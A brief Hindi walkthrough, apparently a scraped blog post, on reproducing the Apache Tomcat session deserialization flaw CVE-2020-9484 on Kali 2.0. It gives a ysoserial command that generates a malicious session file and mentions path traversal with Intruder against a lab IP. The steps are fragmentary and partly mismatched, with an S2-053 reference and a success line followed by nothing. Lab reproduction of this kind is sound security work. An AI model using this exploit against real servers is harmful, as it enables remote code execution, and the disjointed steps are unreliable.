
Kali 2.0 के साथ Apache Tomcat Session डिसीरियलाइज़ेशन कोड निष्पादन भेद्यता का पुनरुत्पादन
Kali 2.0 का उपयोग करके Apache Tomcat Session Deserialization कोड निष्पादन भेद्यता CVE-2020-9484 को पुन: प्रस्तुत करें
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
पहले S2-053 तक पहुँचें कि क्या यह सामान्य रूप से शुरू हुआ है:
http://192.168.152.128:8080/s2-053/
पुनः पहुँचकर पैकेट कैप्चर करें, पथ ट्रैवर्सल के लिए इंट्रूडर का उपयोग करें


कमांड सफलतापूर्वक निष्पादित हुआ:
